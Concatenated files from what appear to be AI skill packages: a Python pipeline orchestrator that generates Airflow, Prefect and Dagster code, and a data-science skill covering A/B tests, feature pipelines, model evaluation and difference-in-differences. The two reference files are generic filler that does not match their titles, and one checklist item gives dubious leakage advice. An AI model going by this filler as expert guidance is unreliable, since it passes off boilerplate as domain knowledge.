partition_parser.add_argument('input', help='Data statistics JSON file')
partition_parser.add_argument('--output', '-o', help='Output file')
partition_parser.add_argument('--json', action='store_true', help='Output as JSON')
partition_parser.set_defaults(func=cmd_optimize_partition)
# Estimate cost command
cost_parser = subparsers.add_parser('estimate-cost', help='Estimate query cost')
cost_parser.add_argument('input', help='SQL file or inline query')
cost_parser.add_argument('--warehouse', '-w', required=True,
choices=['bigquery', 'snowflake', 'redshift', 'databricks'],
help='Target warehouse')
cost_parser.add_argument('--stats', '-s', help='Data statistics JSON file')
cost_parser.add_argument('--output', '-o', help='Output file')
cost_parser.add_argument('--json', action='store_true', help='Output as JSON')
cost_parser.set_defaults(func=cmd_estimate_cost)
# Template command
template_parser = subparsers.add_parser('template', help='Generate template files')
template_parser.add_argument('template', choices=['data_stats', 'spark_metrics'],
help='Template type')
template_parser.add_argument('--output', '-o', help='Output file')
template_parser.set_defaults(func=cmd_generate_template)
args = parser.parse_args()
if args.verbose:
logging.getLogger().setLevel(logging.DEBUG)
if not args.command:
parser.print_help()
sys.exit(1)
try:
args.func(args)
except Exception as e:
logger.error(f"Error: {e}")
if args.verbose:
import traceback
traceback.print_exc()
sys.exit(1)
if __name__ == '__main__':
main()
FILE:scripts/pipeline_orchestrator.py
#!/usr/bin/env python3
"""
Pipeline Orchestrator
Generate pipeline configurations for Airflow, Prefect, and Dagster.
Supports ETL pattern generation, dependency management, and scheduling.
Usage:
python pipeline_orchestrator.py generate --type airflow --source postgres --destination snowflake
python pipeline_orchestrator.py generate --type prefect --config pipeline.yaml
python pipeline_orchestrator.py visualize --dag dags/my_dag.py
python pipeline_orchestrator.py validate --dag dags/my_dag.py
"""
import os
import sys
import json
try:
import yaml
HAS_YAML = True
except ImportError:
HAS_YAML = False
import logging
import argparse
from pathlib import Path
from typing import Dict, List, Optional, Any
from datetime import datetime, timedelta
from dataclasses import dataclass, field, asdict
from abc import ABC, abstractmethod
logging.basicConfig(
level=logging.INFO,
format='%(asctime)s - %(levelname)s - %(message)s'
)
logger = logging.getLogger(__name__)
# ============================================================================
# Data Classes
# ============================================================================
@dataclass
class SourceConfig:
"""Source system configuration."""
type: str # postgres, mysql, s3, kafka, api
connection_id: str
schema: Optional[str] = None
tables: List[str] = field(default_factory=list)
query: Optional[str] = None
incremental_column: Optional[str] = None
incremental_strategy: str = "timestamp" # timestamp, id, cdc
@dataclass
class DestinationConfig:
"""Destination system configuration."""
type: str # snowflake, bigquery, redshift, s3, delta
connection_id: str
schema: str = "raw"
write_mode: str = "append" # append, overwrite, merge
partition_by: Optional[str] = None
cluster_by: List[str] = field(default_factory=list)
@dataclass
class TaskConfig:
"""Individual task configuration."""
task_id: str
operator: str
dependencies: List[str] = field(default_factory=list)
params: Dict[str, Any] = field(default_factory=dict)
retries: int = 2
retry_delay_minutes: int = 5
timeout_minutes: int = 60
pool: Optional[str] = None
priority_weight: int = 1
@dataclass
class PipelineConfig:
"""Complete pipeline configuration."""
name: str
description: str
schedule: str # cron expression or @daily, @hourly
owner: str = "data-team"
tags: List[str] = field(default_factory=list)
catchup: bool = False
max_active_runs: int = 1
default_retries: int = 2
source: Optional[SourceConfig] = None
destination: Optional[DestinationConfig] = None
tasks: List[TaskConfig] = field(default_factory=list)
# ============================================================================
# Pipeline Generators
# ============================================================================
class PipelineGenerator(ABC):
"""Abstract base class for pipeline generators."""
@abstractmethod
def generate(self, config: PipelineConfig) -> str:
"""Generate pipeline code from config."""
pass
@abstractmethod
def validate(self, code: str) -> Dict[str, Any]:
"""Validate generated pipeline code."""
pass
class AirflowGenerator(PipelineGenerator):
"""Generate Airflow DAG code."""
OPERATOR_IMPORTS = {
'python': 'from airflow.operators.python import PythonOperator',
'bash': 'from airflow.operators.bash import BashOperator',
'postgres': 'from airflow.providers.postgres.operators.postgres import PostgresOperator',
'snowflake': 'from airflow.providers.snowflake.operators.snowflake import SnowflakeOperator',
's3': 'from airflow.providers.amazon.aws.operators.s3 import S3CreateBucketOperator',
's3_to_snowflake': 'from airflow.providers.snowflake.transfers.s3_to_snowflake import S3ToSnowflakeOperator',
'sensor': 'from airflow.sensors.base import BaseSensorOperator',
'trigger': 'from airflow.operators.trigger_dagrun import TriggerDagRunOperator',
'email': 'from airflow.operators.email import EmailOperator',
'slack': 'from airflow.providers.slack.operators.slack_webhook import SlackWebhookOperator',
}
def generate(self, config: PipelineConfig) -> str:
"""Generate Airflow DAG from configuration."""
# Collect required imports
imports = self._collect_imports(config)
# Generate DAG code
code = self._generate_header(imports)
code += self._generate_default_args(config)
code += self._generate_dag_definition(config)
code += self._generate_tasks(config)
code += self._generate_dependencies(config)
return code
def _collect_imports(self, config: PipelineConfig) -> List[str]:
"""Collect required import statements."""
imports = [
"from airflow import DAG",
"from airflow.utils.dates import days_ago",
"from datetime import datetime, timedelta",
]
operators_used = set()
for task in config.tasks:
op_type = task.operator.split('_')[0].lower()
if op_type in self.OPERATOR_IMPORTS:
operators_used.add(op_type)
# Add source/destination specific imports
if config.source:
if config.source.type == 'postgres':
operators_used.add('postgres')
elif config.source.type == 's3':
operators_used.add('s3')
if config.destination:
if config.destination.type == 'snowflake':
operators_used.add('snowflake')
operators_used.add('s3_to_snowflake')
for op in operators_used:
if op in self.OPERATOR_IMPORTS:
imports.append(self.OPERATOR_IMPORTS[op])
return imports
def _generate_header(self, imports: List[str]) -> str:
"""Generate file header with imports."""
header = '''"""
Auto-generated Airflow DAG
Generated by Pipeline Orchestrator
"""
'''
header += '\n'.join(imports)
header += '\n\n'
return header
def _generate_default_args(self, config: PipelineConfig) -> str:
"""Generate default_args dictionary."""
return f'''
default_args = {{
'owner': '{config.owner}',
'depends_on_past': False,
'email_on_failure': True,
'email_on_retry': False,
'retries': {config.default_retries},
'retry_delay': timedelta(minutes=5),
}}
'''
def _generate_dag_definition(self, config: PipelineConfig) -> str:
"""Generate DAG definition."""
tags_str = str(config.tags) if config.tags else "[]"
return f'''
with DAG(
dag_id='{config.name}',
default_args=default_args,
description='{config.description}',
schedule_interval='{config.schedule}',
start_date=days_ago(1),
catchup={config.catchup},
max_active_runs={config.max_active_runs},
tags={tags_str},
) as dag:
'''
def _generate_tasks(self, config: PipelineConfig) -> str:
"""Generate task definitions."""
tasks_code = ""
for task in config.tasks:
if 'python' in task.operator.lower():
tasks_code += self._generate_python_task(task)
elif 'bash' in task.operator.lower():
tasks_code += self._generate_bash_task(task)
elif 'sql' in task.operator.lower() or 'postgres' in task.operator.lower():
tasks_code += self._generate_sql_task(task, config)
elif 'snowflake' in task.operator.lower():
tasks_code += self._generate_snowflake_task(task)
else:
tasks_code += self._generate_generic_task(task)
return tasks_code
def _generate_python_task(self, task: TaskConfig) -> str:
"""Generate PythonOperator task."""
callable_name = task.params.get('callable', 'process_data')
return f'''
def {callable_name}(**kwargs):
"""Task: {task.task_id}"""
# Add your processing logic here
execution_date = kwargs.get('ds')
print(f"Processing data for {{execution_date}}")
return True
{task.task_id} = PythonOperator(
task_id='{task.task_id}',
python_callable={callable_name},
retries={task.retries},
retry_delay=timedelta(minutes={task.retry_delay_minutes}),
execution_timeout=timedelta(minutes={task.timeout_minutes}),
)
'''
def _generate_bash_task(self, task: TaskConfig) -> str:
"""Generate BashOperator task."""
command = task.params.get('command', 'echo "Hello World"')
return f'''
{task.task_id} = BashOperator(
task_id='{task.task_id}',
bash_command='{command}',
retries={task.retries},
retry_delay=timedelta(minutes={task.retry_delay_minutes}),
execution_timeout=timedelta(minutes={task.timeout_minutes}),
)
'''
def _generate_sql_task(self, task: TaskConfig, config: PipelineConfig) -> str:
"""Generate SQL operator task."""
sql = task.params.get('sql', 'SELECT 1')
conn_id = config.source.connection_id if config.source else 'default_conn'
return f'''
{task.task_id} = PostgresOperator(
task_id='{task.task_id}',
postgres_conn_id='{conn_id}',
sql="""{sql}""",
retries={task.retries},
retry_delay=timedelta(minutes={task.retry_delay_minutes}),
)
'''
def _generate_snowflake_task(self, task: TaskConfig) -> str:
"""Generate SnowflakeOperator task."""
sql = task.params.get('sql', 'SELECT 1')
return f'''
{task.task_id} = SnowflakeOperator(
task_id='{task.task_id}',
snowflake_conn_id='snowflake_default',
sql="""{sql}""",
retries={task.retries},
retry_delay=timedelta(minutes={task.retry_delay_minutes}),
)
'''
def _generate_generic_task(self, task: TaskConfig) -> str:
"""Generate generic task placeholder."""
return f'''
# TODO: Implement {task.operator} for {task.task_id}
{task.task_id} = PythonOperator(
task_id='{task.task_id}',
python_callable=lambda: print("{task.task_id}"),
)
'''
def _generate_dependencies(self, config: PipelineConfig) -> str:
"""Generate task dependencies."""
deps_code = "\n # Task dependencies\n"
for task in config.tasks:
if task.dependencies:
for dep in task.dependencies:
deps_code += f" {dep} >> {task.task_id}\n"
return deps_code
def validate(self, code: str) -> Dict[str, Any]:
"""Validate generated DAG code."""
issues = []
warnings = []
# Check for common issues
if 'default_args' not in code:
issues.append("Missing default_args definition")
if 'with DAG' not in code:
issues.append("Missing DAG context manager")
if 'schedule_interval' not in code:
warnings.append("No schedule_interval defined, DAG won't run automatically")
# Try to parse the code
try:
compile(code, '<string>', 'exec')
except SyntaxError as e:
issues.append(f"Syntax error: {e}")
return {
'valid': len(issues) == 0,
'issues': issues,
'warnings': warnings
}
class PrefectGenerator(PipelineGenerator):
"""Generate Prefect flow code."""
def generate(self, config: PipelineConfig) -> str:
"""Generate Prefect flow from configuration."""
code = self._generate_header()
code += self._generate_tasks(config)
code += self._generate_flow(config)
return code
def _generate_header(self) -> str:
"""Generate file header."""
return '''"""
Auto-generated Prefect Flow
Generated by Pipeline Orchestrator
"""
from prefect import flow, task, get_run_logger
from prefect.tasks import task_input_hash
from datetime import timedelta
import pandas as pd
'''
def _generate_tasks(self, config: PipelineConfig) -> str:
"""Generate Prefect tasks."""
tasks_code = ""
for task_config in config.tasks:
cache_expiration = task_config.params.get('cache_hours', 1)
tasks_code += f'''
@task(
name="{task_config.task_id}",
retries={task_config.retries},
retry_delay_seconds={task_config.retry_delay_minutes * 60},
cache_key_fn=task_input_hash,
cache_expiration=timedelta(hours={cache_expiration}),
)
def {task_config.task_id}(input_data=None):
"""Task: {task_config.task_id}"""
logger = get_run_logger()
logger.info(f"Executing {task_config.task_id}")
# Add processing logic here
result = input_data
return result
'''
return tasks_code
def _generate_flow(self, config: PipelineConfig) -> str:
"""Generate Prefect flow."""
flow_code = f'''
@flow(
name="{config.name}",
description="{config.description}",
version="1.0.0",
)
def {config.name.replace('-', '_')}_flow():
"""Main flow orchestrating all tasks."""
logger = get_run_logger()
logger.info("Starting flow: {config.name}")
'''
# Generate task calls with dependencies
task_vars = {}
for i, task_config in enumerate(config.tasks):
task_name = task_config.task_id
var_name = f"result_{i}"
task_vars[task_name] = var_name
if task_config.dependencies:
# Get input from first dependency
dep_var = task_vars.get(task_config.dependencies[0], "None")
flow_code += f" {var_name} = {task_name}({dep_var})\n"
else:
flow_code += f" {var_name} = {task_name}()\n"
flow_code += '''
logger.info("Flow completed successfully")
return True
if __name__ == "__main__":
''' + f'{config.name.replace("-", "_")}_flow()' + '\n'
return flow_code
def validate(self, code: str) -> Dict[str, Any]:
"""Validate Prefect flow code."""
issues = []
if '@flow' not in code:
issues.append("Missing @flow decorator")
if '@task' not in code:
issues.append("No tasks defined with @task decorator")
try:
compile(code, '<string>', 'exec')
except SyntaxError as e:
issues.append(f"Syntax error: {e}")
return {
'valid': len(issues) == 0,
'issues': issues,
'warnings': []
}
class DagsterGenerator(PipelineGenerator):
"""Generate Dagster job code."""
def generate(self, config: PipelineConfig) -> str:
"""Generate Dagster job from configuration."""
code = self._generate_header()
code += self._generate_ops(config)
code += self._generate_job(config)
return code
def _generate_header(self) -> str:
"""Generate file header."""
return '''"""
Auto-generated Dagster Job
Generated by Pipeline Orchestrator
"""
from dagster import op, job, In, Out, Output, DynamicOut, graph
from dagster import AssetMaterialization, MetadataValue
import pandas as pd
'''
def _generate_ops(self, config: PipelineConfig) -> str:
"""Generate Dagster ops."""
ops_code = ""
for task_config in config.tasks:
has_input = len(task_config.dependencies) > 0
if has_input:
ops_code += f'''
@op(
ins={{"input_data": In()}},
out=Out(),
)
def {task_config.task_id}(context, input_data):
"""Op: {task_config.task_id}"""
context.log.info(f"Executing {task_config.task_id}")
# Add processing logic here
result = input_data
# Log asset materialization
yield AssetMaterialization(
asset_key="{task_config.task_id}",
metadata={{
"row_count": MetadataValue.int(len(result) if hasattr(result, '__len__') else 0),
}}
)
yield Output(result)
'''
else:
ops_code += f'''
@op(out=Out())
def {task_config.task_id}(context):
"""Op: {task_config.task_id}"""
context.log.info(f"Executing {task_config.task_id}")
# Add processing logic here
result = {{}}
yield AssetMaterialization(
asset_key="{task_config.task_id}",
)
yield Output(result)
'''
return ops_code
def _generate_job(self, config: PipelineConfig) -> str:
"""Generate Dagster job."""
job_code = f'''
@job(
name="{config.name}",
description="{config.description}",
tags={{
"owner": "{config.owner}",
"schedule": "{config.schedule}",
}},
)
def {config.name.replace('-', '_')}_job():
"""Main job orchestrating all ops."""
'''
# Build dependency graph
task_outputs = {}
for task_config in config.tasks:
task_name = task_config.task_id
if task_config.dependencies:
dep_output = task_outputs.get(task_config.dependencies[0], None)
if dep_output:
job_code += f" {task_name}_output = {task_name}({dep_output})\n"
else:
job_code += f" {task_name}_output = {task_name}()\n"
else:
job_code += f" {task_name}_output = {task_name}()\n"
task_outputs[task_name] = f"{task_name}_output"
return job_code
def validate(self, code: str) -> Dict[str, Any]:
"""Validate Dagster job code."""
issues = []
if '@job' not in code:
issues.append("Missing @job decorator")
if '@op' not in code:
issues.append("No ops defined with @op decorator")
try:
compile(code, '<string>', 'exec')
except SyntaxError as e:
issues.append(f"Syntax error: {e}")
return {
'valid': len(issues) == 0,
'issues': issues,
'warnings': []
}
# ============================================================================
# ETL Pattern Templates
# ============================================================================
class ETLPatternGenerator:
"""Generate common ETL patterns."""
@staticmethod
def generate_extract_load(
source_type: str,
destination_type: str,
tables: List[str],
mode: str = "incremental"
) -> PipelineConfig:
"""Generate extract-load pipeline configuration."""
tasks = []
# Extract tasks
for table in tables:
extract_task = TaskConfig(
task_id=f"extract_{table}",
operator="python_operator",
params={
'callable': f'extract_{table}',
'sql': f'SELECT * FROM {table}' + (
' WHERE updated_at > {{{{ prev_ds }}}}' if mode == 'incremental' else ''
)
}
)
tasks.append(extract_task)
# Load tasks with dependencies
for table in tables:
load_task = TaskConfig(
task_id=f"load_{table}",
operator="python_operator",
dependencies=[f"extract_{table}"],
params={'callable': f'load_{table}'}
)
tasks.append(load_task)
# Quality check task
quality_task = TaskConfig(
task_id="quality_check",
operator="python_operator",
dependencies=[f"load_{table}" for table in tables],
params={'callable': 'run_quality_checks'}
)
tasks.append(quality_task)
return PipelineConfig(
name=f"el_{source_type}_to_{destination_type}",
description=f"Extract from {source_type}, load to {destination_type}",
schedule="0 5 * * *", # Daily at 5 AM
tags=["etl", source_type, destination_type],
source=SourceConfig(
type=source_type,
connection_id=f"{source_type}_default",
tables=tables,
incremental_strategy="timestamp" if mode == "incremental" else "full"
),
destination=DestinationConfig(
type=destination_type,
connection_id=f"{destination_type}_default",
write_mode="append" if mode == "incremental" else "overwrite"
),
tasks=tasks
)
@staticmethod
def generate_transform_pipeline(
source_tables: List[str],
target_table: str,
dbt_models: List[str]
) -> PipelineConfig:
"""Generate transformation pipeline with dbt."""
tasks = []
# Sensor for source freshness
for table in source_tables:
sensor_task = TaskConfig(
task_id=f"wait_for_{table}",
operator="sql_sensor",
params={
'sql': f"SELECT MAX(updated_at) FROM {table} WHERE updated_at > '{{{{ ds }}}}'"
}
)
tasks.append(sensor_task)
# dbt run task
dbt_run = TaskConfig(
task_id="dbt_run",
operator="bash_operator",
dependencies=[f"wait_for_{t}" for t in source_tables],
params={
'command': f'cd /opt/dbt && dbt run --select {" ".join(dbt_models)}'
},
timeout_minutes=120
)
tasks.append(dbt_run)
# dbt test task
dbt_test = TaskConfig(
task_id="dbt_test",
operator="bash_operator",
dependencies=["dbt_run"],
params={
'command': f'cd /opt/dbt && dbt test --select {" ".join(dbt_models)}'
}
)
tasks.append(dbt_test)
return PipelineConfig(
name=f"transform_{target_table}",
description=f"Transform data into {target_table} using dbt",
schedule="0 6 * * *", # Daily at 6 AM (after extraction)
tags=["transform", "dbt"],
tasks=tasks
)
# ============================================================================
# CLI Interface
# ============================================================================
def main():
parser = argparse.ArgumentParser(
description="Pipeline Orchestrator - Generate and manage data pipeline configurations",
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog="""
Examples:
Generate Airflow DAG:
python pipeline_orchestrator.py generate --type airflow --source postgres --destination snowflake --tables orders,customers
Generate from config file:
python pipeline_orchestrator.py generate --config pipeline.yaml --type prefect
Validate existing DAG:
python pipeline_orchestrator.py validate --dag dags/my_dag.py --type airflow
"""
)
subparsers = parser.add_subparsers(dest='command', help='Command to run')
# Generate command
gen_parser = subparsers.add_parser('generate', help='Generate pipeline code')
gen_parser.add_argument('--type', '-t', required=True,
choices=['airflow', 'prefect', 'dagster'],
help='Pipeline framework type')
gen_parser.add_argument('--source', '-s', help='Source system type')
gen_parser.add_argument('--destination', '-d', help='Destination system type')
gen_parser.add_argument('--tables', help='Comma-separated list of tables')
gen_parser.add_argument('--config', '-c', help='Configuration YAML file')
gen_parser.add_argument('--output', '-o', help='Output file path')
gen_parser.add_argument('--name', '-n', help='Pipeline name')
gen_parser.add_argument('--schedule', default='0 5 * * *', help='Cron schedule')
gen_parser.add_argument('--mode', default='incremental',
choices=['incremental', 'full'],
help='Load mode')
# Validate command
val_parser = subparsers.add_parser('validate', help='Validate pipeline code')
val_parser.add_argument('--dag', required=True, help='DAG file to validate')
val_parser.add_argument('--type', '-t', required=True,
choices=['airflow', 'prefect', 'dagster'])
# Template command
tmpl_parser = subparsers.add_parser('template', help='Generate from template')
tmpl_parser.add_argument('--pattern', '-p', required=True,
choices=['extract-load', 'transform', 'cdc'],
help='ETL pattern to generate')
tmpl_parser.add_argument('--type', '-t', required=True,
choices=['airflow', 'prefect', 'dagster'])
tmpl_parser.add_argument('--source', '-s', required=True)
tmpl_parser.add_argument('--destination', '-d', required=True)
tmpl_parser.add_argument('--tables', required=True)
tmpl_parser.add_argument('--output', '-o', help='Output file path')
args = parser.parse_args()
if args.command is None:
parser.print_help()
sys.exit(1)
try:
if args.command == 'generate':
# Load config if provided
if args.config:
with open(args.config) as f:
if HAS_YAML:
config_data = yaml.safe_load(f)
else:
config_data = json.load(f)
config = PipelineConfig(**config_data)
else:
# Build config from arguments
tables = args.tables.split(',') if args.tables else []
config = ETLPatternGenerator.generate_extract_load(
source_type=args.source or 'postgres',
destination_type=args.destination or 'snowflake',
tables=tables,
mode=args.mode
)
if args.name:
config.name = args.name
config.schedule = args.schedule
# Generate code
generators = {
'airflow': AirflowGenerator(),
'prefect': PrefectGenerator(),
'dagster': DagsterGenerator()
}
generator = generators[args.type]
code = generator.generate(config)
# Validate
validation = generator.validate(code)
if not validation['valid']:
logger.warning(f"Validation issues: {validation['issues']}")
# Output
if args.output:
with open(args.output, 'w') as f:
f.write(code)
logger.info(f"Generated pipeline saved to {args.output}")
else:
print(code)
elif args.command == 'validate':
with open(args.dag) as f:
code = f.read()
generators = {
'airflow': AirflowGenerator(),
'prefect': PrefectGenerator(),
'dagster': DagsterGenerator()
}
generator = generators[args.type]
result = generator.validate(code)
print(json.dumps(result, indent=2))
sys.exit(0 if result['valid'] else 1)
elif args.command == 'template':
tables = args.tables.split(',')
if args.pattern == 'extract-load':
config = ETLPatternGenerator.generate_extract_load(
source_type=args.source,
destination_type=args.destination,
tables=tables
)
elif args.pattern == 'transform':
config = ETLPatternGenerator.generate_transform_pipeline(
source_tables=tables,
target_table='fct_output',
dbt_models=['stg_*', 'fct_*']
)
else:
logger.error(f"Pattern {args.pattern} not yet implemented")
sys.exit(1)
generators = {
'airflow': AirflowGenerator(),
'prefect': PrefectGenerator(),
'dagster': DagsterGenerator()
}
generator = generators[args.type]
code = generator.generate(config)
if args.output:
with open(args.output, 'w') as f:
f.write(code)
logger.info(f"Generated {args.pattern} pipeline saved to {args.output}")
else:
print(code)
sys.exit(0)
except Exception as e:
logger.error(f"Error: {e}")
sys.exit(1)
if __name__ == '__main__':
main()
Mô hình thống kê, thiết kế thí nghiệm, suy luận nhân quả, phân tích dự báo, A/B testing và feature engineering.
---
name: "senior-data-scientist"
description: World-class senior data scientist skill specialising in statistical modeling, experiment design, causal inference, and predictive analytics. Covers A/B testing (sample sizing, two-proportion z-tests, Bonferroni correction), difference-in-differences, feature engineering pipelines (Scikit-learn, XGBoost), cross-validated model evaluation (AUC-ROC, AUC-PR, SHAP), and MLflow experiment tracking — using Python (NumPy, Pandas, Scikit-learn), R, and SQL. Use when designing or analysing controlled experiments, building and evaluating classification or regression models, performing causal analysis on observational data, engineering features for structured tabular datasets, or translating statistical findings into data-driven business decisions.
---
# Senior Data Scientist
World-class senior data scientist skill for production-grade AI/ML/Data systems.
## Core Workflows
### 1. Design an A/B Test
```python
import numpy as np
from scipy import stats
def calculate_sample_size(baseline_rate, mde, alpha=0.05, power=0.8):
"""
Calculate required sample size per variant.
baseline_rate: current conversion rate (e.g. 0.10)
mde: minimum detectable effect (relative, e.g. 0.05 = 5% lift)
"""
p1 = baseline_rate
p2 = baseline_rate * (1 + mde)
effect_size = abs(p2 - p1) / np.sqrt((p1 * (1 - p1) + p2 * (1 - p2)) / 2)
z_alpha = stats.norm.ppf(1 - alpha / 2)
z_beta = stats.norm.ppf(power)
n = ((z_alpha + z_beta) / effect_size) ** 2
return int(np.ceil(n))
def analyze_experiment(control, treatment, alpha=0.05):
"""
Run two-proportion z-test and return structured results.
control/treatment: dicts with 'conversions' and 'visitors'.
"""
p_c = control["conversions"] / control["visitors"]
p_t = treatment["conversions"] / treatment["visitors"]
pooled = (control["conversions"] + treatment["conversions"]) / (control["visitors"] + treatment["visitors"])
se = np.sqrt(pooled * (1 - pooled) * (1 / control["visitors"] + 1 / treatment["visitors"]))
z = (p_t - p_c) / se
p_value = 2 * (1 - stats.norm.cdf(abs(z)))
ci_low = (p_t - p_c) - stats.norm.ppf(1 - alpha / 2) * se
ci_high = (p_t - p_c) + stats.norm.ppf(1 - alpha / 2) * se
return {
"lift": (p_t - p_c) / p_c,
"p_value": p_value,
"significant": p_value < alpha,
"ci_95": (ci_low, ci_high),
}
# --- Experiment checklist ---
# 1. Define ONE primary metric and pre-register secondary metrics.
# 2. Calculate sample size BEFORE starting: calculate_sample_size(0.10, 0.05)
# 3. Randomise at the user (not session) level to avoid leakage.
# 4. Run for at least 1 full business cycle (typically 2 weeks).
# 5. Check for sample ratio mismatch: abs(n_control - n_treatment) / expected < 0.01
# 6. Analyze with analyze_experiment() and report lift + CI, not just p-value.
# 7. Apply Bonferroni correction if testing multiple metrics: alpha / n_metrics
```
### 2. Build a Feature Engineering Pipeline
```python
import pandas as pd
import numpy as np
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import StandardScaler, OneHotEncoder
from sklearn.impute import SimpleImputer
from sklearn.compose import ColumnTransformer
def build_feature_pipeline(numeric_cols, categorical_cols, date_cols=None):
"""
Returns a fitted-ready ColumnTransformer for structured tabular data.
"""
numeric_pipeline = Pipeline([
("impute", SimpleImputer(strategy="median")),
("scale", StandardScaler()),
])
categorical_pipeline = Pipeline([
("impute", SimpleImputer(strategy="most_frequent")),
("encode", OneHotEncoder(handle_unknown="ignore", sparse_output=False)),
])
transformers = [
("num", numeric_pipeline, numeric_cols),
("cat", categorical_pipeline, categorical_cols),
]
return ColumnTransformer(transformers, remainder="drop")
def add_time_features(df, date_col):
"""Extract cyclical and lag features from a datetime column."""
df = df.copy()
df[date_col] = pd.to_datetime(df[date_col])
df["dow_sin"] = np.sin(2 * np.pi * df[date_col].dt.dayofweek / 7)
df["dow_cos"] = np.cos(2 * np.pi * df[date_col].dt.dayofweek / 7)
df["month_sin"] = np.sin(2 * np.pi * df[date_col].dt.month / 12)
df["month_cos"] = np.cos(2 * np.pi * df[date_col].dt.month / 12)
df["is_weekend"] = (df[date_col].dt.dayofweek >= 5).astype(int)
return df
# --- Feature engineering checklist ---
# 1. Never fit transformers on the full dataset — fit on train, transform test.
# 2. Log-transform right-skewed numeric features before scaling.
# 3. For high-cardinality categoricals (>50 levels), use target encoding or embeddings.
# 4. Generate lag/rolling features BEFORE the train/test split to avoid leakage.
# 5. Document each feature's business meaning alongside its code.
```
### 3. Train, Evaluate, and Select a Prediction Model
```python
from sklearn.model_selection import StratifiedKFold, cross_validate
from sklearn.metrics import make_scorer, roc_auc_score, average_precision_score
import xgboost as xgb
import mlflow
SCORERS = {
"roc_auc": make_scorer(roc_auc_score, needs_proba=True),
"avg_prec": make_scorer(average_precision_score, needs_proba=True),
}
def evaluate_model(model, X, y, cv=5):
"""
Cross-validate and return mean ± std for each scorer.
Use StratifiedKFold for classification to preserve class balance.
"""
cv_results = cross_validate(
model, X, y,
cv=StratifiedKFold(n_splits=cv, shuffle=True, random_state=42),
scoring=SCORERS,
return_train_score=True,
)
summary = {}
for metric in SCORERS:
test_scores = cv_results[f"test_{metric}"]
summary[metric] = {"mean": test_scores.mean(), "std": test_scores.std()}
# Flag overfitting: large gap between train and test score
train_mean = cv_results[f"train_{metric}"].mean()
summary[metric]["overfit_gap"] = train_mean - test_scores.mean()
return summary
def train_and_log(model, X_train, y_train, X_test, y_test, run_name):
"""Train model and log all artefacts to MLflow."""
with mlflow.start_run(run_name=run_name):
model.fit(X_train, y_train)
proba = model.predict_proba(X_test)[:, 1]
metrics = {
"roc_auc": roc_auc_score(y_test, proba),
"avg_prec": average_precision_score(y_test, proba),
}
mlflow.log_params(model.get_params())
mlflow.log_metrics(metrics)
mlflow.sklearn.log_model(model, "model")
return metrics
# --- Model evaluation checklist ---
# 1. Always report AUC-PR alongside AUC-ROC for imbalanced datasets.
# 2. Check overfit_gap > 0.05 as a warning sign of overfitting.
# 3. Calibrate probabilities (Platt scaling / isotonic) before production use.
# 4. Compute SHAP values to validate feature importance makes business sense.
# 5. Run a baseline (e.g. DummyClassifier) and verify the model beats it.
# 6. Log every run to MLflow — never rely on notebook output for comparison.
```
### 4. Causal Inference: Difference-in-Differences
```python
import statsmodels.formula.api as smf
def diff_in_diff(df, outcome, treatment_col, post_col, controls=None):
"""
Estimate ATT via OLS DiD with optional covariates.
df must have: outcome, treatment_col (0/1), post_col (0/1).
Returns the interaction coefficient (treatment × post) and its p-value.
"""
covariates = " + ".join(controls) if controls else ""
formula = (
f"{outcome} ~ {treatment_col} * {post_col}"
+ (f" + {covariates}" if covariates else "")
)
result = smf.ols(formula, data=df).fit(cov_type="HC3")
interaction = f"{treatment_col}:{post_col}"
return {
"att": result.params[interaction],
"p_value": result.pvalues[interaction],
"ci_95": result.conf_int().loc[interaction].tolist(),
"summary": result.summary(),
}
# --- Causal inference checklist ---
# 1. Validate parallel trends in pre-period before trusting DiD estimates.
# 2. Use HC3 robust standard errors to handle heteroskedasticity.
# 3. For panel data, cluster SEs at the unit level (add groups= param to fit).
# 4. Consider propensity score matching if groups differ at baseline.
# 5. Report the ATT with confidence interval, not just statistical significance.
```
## Reference Documentation
- **Statistical Methods:** `references/statistical_methods_advanced.md`
- **Experiment Design Frameworks:** `references/experiment_design_frameworks.md`
- **Feature Engineering Patterns:** `references/feature_engineering_patterns.md`
## Common Commands
```bash
# Testing & linting
python -m pytest tests/ -v --cov=src/
python -m black src/ && python -m pylint src/
# Training & evaluation
python scripts/train.py --config prod.yaml
python scripts/evaluate.py --model best.pth
# Deployment
docker build -t service:v1 .
kubectl apply -f k8s/
helm upgrade service ./charts/
# Monitoring & health
kubectl logs -f deployment/service
python scripts/health_check.py
```
FILE:references/experiment_design_frameworks.md
# Experiment Design Frameworks
## Overview
World-class experiment design frameworks for senior data scientist.
## Core Principles
### Production-First Design
Always design with production in mind:
- Scalability: Handle 10x current load
- Reliability: 99.9% uptime target
- Maintainability: Clear, documented code
- Observability: Monitor everything
### Performance by Design
Optimize from the start:
- Efficient algorithms
- Resource awareness
- Strategic caching
- Batch processing
### Security & Privacy
Build security in:
- Input validation
- Data encryption
- Access control
- Audit logging
## Advanced Patterns
### Pattern 1: Distributed Processing
Enterprise-scale data processing with fault tolerance.
### Pattern 2: Real-Time Systems
Low-latency, high-throughput systems.
### Pattern 3: ML at Scale
Production ML with monitoring and automation.
## Best Practices
### Code Quality
- Comprehensive testing
- Clear documentation
- Code reviews
- Type hints
### Performance
- Profile before optimizing
- Monitor continuously
- Cache strategically
- Batch operations
### Reliability
- Design for failure
- Implement retries
- Use circuit breakers
- Monitor health
## Tools & Technologies
Essential tools for this domain:
- Development frameworks
- Testing libraries
- Deployment platforms
- Monitoring solutions
## Further Reading
- Research papers
- Industry blogs
- Conference talks
- Open source projects
FILE:references/feature_engineering_patterns.md
# Feature Engineering Patterns
## Overview
World-class feature engineering patterns for senior data scientist.
## Core Principles
### Production-First Design
Always design with production in mind:
- Scalability: Handle 10x current load
- Reliability: 99.9% uptime target
- Maintainability: Clear, documented code
- Observability: Monitor everything
### Performance by Design
Optimize from the start:
- Efficient algorithms
- Resource awareness
- Strategic caching
- Batch processing
### Security & Privacy
Build security in:
- Input validation
- Data encryption
- Access control
- Audit logging
## Advanced Patterns
### Pattern 1: Distributed Processing
Enterprise-scale data processing with fault tolerance.
### Pattern 2: Real-Time Systems
Low-latency, high-throughput systems.
### Pattern 3: ML at Scale
Production ML with monitoring and automation.
## Best Practices
### Code Quality
- Comprehensive testing
- Clear documentation
- Code reviews
- Type hints
### Performance
- Profile before optimizing
- Monitor continuously
- Cache strategically
- Batch operations
### Reliability
- Design for failure
- Implement retries
- Use circuit breakers
- Monitor health
## Tools & Technologies
Essential tools for this domain:
- Development frameworks
- Testing libraries
